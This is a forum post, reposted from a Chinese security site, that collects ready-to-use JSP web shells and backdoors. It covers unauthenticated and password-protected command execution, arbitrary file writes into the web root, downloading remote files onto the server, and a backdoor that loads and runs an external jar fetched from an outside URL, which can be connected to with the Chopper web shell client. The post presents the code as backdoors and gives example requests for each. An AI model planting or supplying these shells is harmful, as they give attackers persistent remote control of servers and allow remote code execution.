|
|
Posted on 1/2/2015 6:46:57 PM
|
|
|
|
Transferred from: http://p2j.cn/?p=1627
1. Execute system commands:
Execute system commands without echo:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Request: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
There will be no echo after execution, which is very convenient for bounce shells.
There are echoes with password verification:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); }%>
Request: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls
2. Encode the string and write it to the specified file:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Request: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Write to the web directory:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Request: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Request: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Write to the web directory:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Request: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Download the remote file (if you don't use apache io utils, you can't convert the inputstream to byte, so it's very long...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Request: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Download to the web path:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Request: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Four: Reflection calls the external jar, perfect the back door
If you dislike the above backdoor function is too weak and outdated, you can try this:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Request: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A
Kitchen knife connection: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, password 023.
Solution:
Use reflection to load an external jar into the current application, and reflection executes the output processing result. request.getParameterMap() contains all the parameters requested. Since the external jar package is loaded, the server must be able to access this jar address. |
Previous:The crisis behind the TXT text fileNext:Java MD5 encryption, Base64 encryption and decryption Java executes system command source code
|
Posted on 1/2/2015 8:17:30 PM
|
Landlord|
Posted on 1/2/2015 8:39:44 PM
|
